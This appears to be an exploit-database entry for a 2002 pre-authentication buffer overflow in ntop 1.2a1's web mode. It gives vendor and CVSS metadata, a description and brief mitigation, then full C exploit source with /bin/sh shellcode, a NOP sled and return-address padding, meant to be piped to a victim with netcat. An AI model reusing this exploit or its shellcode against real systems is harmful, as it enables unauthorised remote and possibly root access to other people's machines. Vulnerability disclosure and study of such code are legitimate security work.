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vendor:
ntop
by:
mat@hacksware.com
7.5
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: ntop
Affected Version From: 1.2a1
Affected Version To: 1.2a1
Patch Exists: YES
Related CWE: N/A
CPE: a:ntop:ntop:1.2a1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: *BSD
2002

NTOP ntop-1.2a1 -w mode command execution exploit

NTOP is a network usage monitoring tool for unix systems. It can be invoked at the console or as a server daemon, presenting statistics information via http with the -w parameter. In this mode, it is vulnerable to a buffer overflow before the user connecting to it can be authenticated. If exploited, an attacker can gain remote access to the system with the priviliges ntop is executing with. It is interesting to note that setuid ntop drops priviliges before this can be exploited, but is installed on *BSD systems only executable by members of group wheel. This leads to the assumption that it may often be executed as root (since users in wheel typically have root access..), so despite the fact that it drops priviliges it can still yield remote root access for the attacker if exploited when run as root.

Mitigation:

The user should ensure that the ntop is not running as root and should also ensure that the system is patched with the latest security updates.
Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/1576/info


ntop is a network usage monitoring tool for unix systems. It can be invoked at the console or as a server daemon, presenting statistics information via http with the -w parameter. In this mode, it is vulnerable to a buffer overflow before the user connecting to it can be authenticated. If exploited, an attacker can gain remote access to the system with the priviliges ntop is executing with. 

It is interesting to note that setuid ntop drops priviliges before this can be exploited, but is installed on *BSD systems only executable by members of group wheel. This leads to the assumption that it may often be executed as root (since users in wheel typically have root access..), so despite the fact that it drops priviliges it can still yield remote root access for the attacker if exploited when run as root.


#include <stdio.h>
#include <string.h>


char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

void usage()
{
 printf("NTOP ntop-1.2a1 -w mode command execution exploit.\n");
 printf("                                 mat@hacksware.com\n");
 printf("Usage : ./ntop-w-exp | nc victim port\n");
 exit(0);
}

void main( int argc, char *argv[] )
{
  int i,offset=-24;
#define CODE_LEN 240
#define NOP_LEN 50
  char code_buf[CODE_LEN];
  unsigned long esp=0xbedffb00;

  if(argc >= 2) offset = atoi(argv[1]);

  memset(code_buf,0x90,NOP_LEN); //insert NOP CODES
  memcpy(code_buf+NOP_LEN, shellcode, strlen(shellcode));
  for(i=strlen(shellcode)+NOP_LEN;i<=CODE_LEN;i+=4)
     *(long *)&code_buf[i]=(unsigned long)esp-offset;

  printf("GET /");
  for(i=0;i<CODE_LEN; i++)
  {
     putchar(code_buf[i]);
  }
  printf("\r\n\r\n");
}